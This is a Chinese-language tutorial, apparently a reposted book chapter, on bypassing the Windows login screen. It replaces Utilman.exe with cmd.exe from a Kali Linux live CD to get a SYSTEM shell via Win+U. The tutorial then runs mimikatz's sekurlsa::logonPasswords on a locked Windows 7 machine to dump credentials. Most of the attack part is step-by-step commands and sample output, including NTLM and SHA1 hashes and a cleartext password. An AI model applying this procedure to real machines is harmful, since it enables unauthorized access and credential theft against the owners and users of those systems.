Kali-linux绕过Utilman登录

Utilman是Windows辅助工具管理器。该程序是存放在Windows系统文件中最重要的文件,通常情况下是在安装系统过程中自动创建的,对于系统正常运行来说至关重要。在Windows下,使用Windows+U组合键可以调用Utilman进程。本节将介绍绕过Utilman程序登录系统,就可以运行其他操作。

(1)在Windows界面,启动Kali Linux LiveCD,如图8.7所示。

图8.7 Kali Linux引导界面

(2)在该界面选择Live (686-pae),按下回车键即可启动Kali Linux,如图8.8所示。

图8.8 Kali Linux操作系统

(3)在该界面打开Windows文件系统。在Kali Linux桌面依次选择Places|43GB Filesystem选项,将打开如图8.9所示的界面。这里的43G表示当前Windows系统的磁盘大小。

图8.9 Windows磁盘中的文件和文件夹

(4)该界面显示了Windows操作系统中的文件和文件夹。这里依次打开Windows|System32文件夹,将显示如图8.10所示的内容。

图8.10 System32目录中的内容

(5)在该文件夹中找到Utilman.exe文件,将该文件重命名为Utilman.old。然后复制cmd.exe文件,并将其文件名修改为Utilman.exe。

(6)现在关闭Kali Linux,并启动Windows系统。在登录界面按下Windows+u组合键,将显示如图8.11所示的界面。

图8.11 Windows登录界面

(7)从该界面可以看到打开一个命令提示符窗口。在该窗口中,可以执行一些DOS命令。例如,使用whoami命令查看用户信息,将显示如图8.12所示的界面。

图8.12 用户权限信息

(8)从输出的界面可以看到,当前用户拥有最高的权限。此时,就可以进行任何的 操作。

学习了绕过Utilman登录后,可以使用mimikatz工具恢复目标系统锁定状态时用户的密码。下面将介绍使用mimikatz工具,从锁定状态恢复密码。

在操作之前需要做一些准备工作。首先从http://blog.gentilkiwi.com/mimikatz网站下载mimikatz工具,其软件包名为mimikatz_trunk.zip。然后将该软件包解压,并保存到一个USB磁盘中。本例中,将解压的文件保存到优盘的mimikatz目录中。

(1)在系统中安装Utilman Bypass,以便能执行一些命令。

(2)在锁定桌面的Windows桌面按下Windows+u组合键,如图8.13所示。

图8.13 启动命令行

默认情况下使用Windows+u组合键启动DOS窗口后,该窗口缓冲区的高度是30。当输出的数据较多时,将看不到所有的内容。所以需要到DOS窗口的属性菜单中,增加窗口的高度,如图8.14所示。

图8.14 属性菜单

在该界面选择“布局”标签,修改屏幕缓冲区大小下面的高度值。然后单击“确定”按钮,即可滚动鼠标查看所有内容。

(3)从图8.13中可以看到,Windows7系统处于锁定状态。此时通过在命令行执行一些命令恢复Windows用户密码。首先确认当前用户的权限,执行命令如下所示:

C:Windowssystem32> whoami
nt authoritysystem

(4)进入到USB磁盘中,并查看磁盘中的内容。本例中的USB磁盘号F:,执行命令如下所示:

C:Windowssystem32> F:
F:>dir mimikatz
2014/05/26 03:45    4,311 README.md
2014/06/15 04:54    Win32
2014/06/15 04:54    x64

从输出的信息中,可以看到mimikatz目录中有三个文件。其中Win32和x64表示mimikatz的两个版本。根据自己的系统架构选择相应的版本,本例中的操作系统是32位,所以选择使用Win32。

(5)查看Win32目录中的内容:

F:>cd mimikatz
F:Mimikatz>cd win32
F:MimikatzWin32>dir
2014/06/15 04:54   29,056 mimidrv.sys
2014/06/15 04:54   189,936 mimikatz.exe
2014/06/15 04:54   27,632 mimilib.dll

从输出的信息中,可以看到Win32目录中有三个文件。其中,mimikatz是一个可执行文件。

(6)运行mimikatz程序。执行命令如下所示:

输出信息显示了mimikatz的一些相关信息,其中mimikatz #提示符表示成功登录到了mimikatz程序。

(7)恢复密码。执行命令如下所示:

mimikatz # sekurlsa::logonPasswords

或:

mimikatz # sekurlsa::logonPasswords full

将输出如下所示的信息:

Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session              : Interactive from 1
User Name            : lyw
Domain               : Windows7Test
SID                  : S-1-5-21-2306344666-604645106-2825843324-1001
       msv :
  [00010000] CredentialKeys
  * NTLM    : 32ed87bdb5fdc5e9cba88547376818d4
  * SHA1    : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
  [00000003] Primary
  * Username : lyw
  * Domain   : Windows7Test
  * NTLM      : 32ed87bdb5fdc5e9cba88547376818d4
  * SHA1      : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
 tspkg :
 wdigest :
  * Username  : lyw
  * Domain    : Windows7Test
  * Password  : 123456
 kerberos :
  * Username  : lyw
  * Domain    : Windows7Test
  * Password  : (null)
 ssp :
 credman :

从以上输出信息中,可以看到锁定用户的所有信息。如用户名、各种加密的HASH值、域名和密码等。

原文地址:https://www.cnblogs.com/student-programmer/p/6728992.html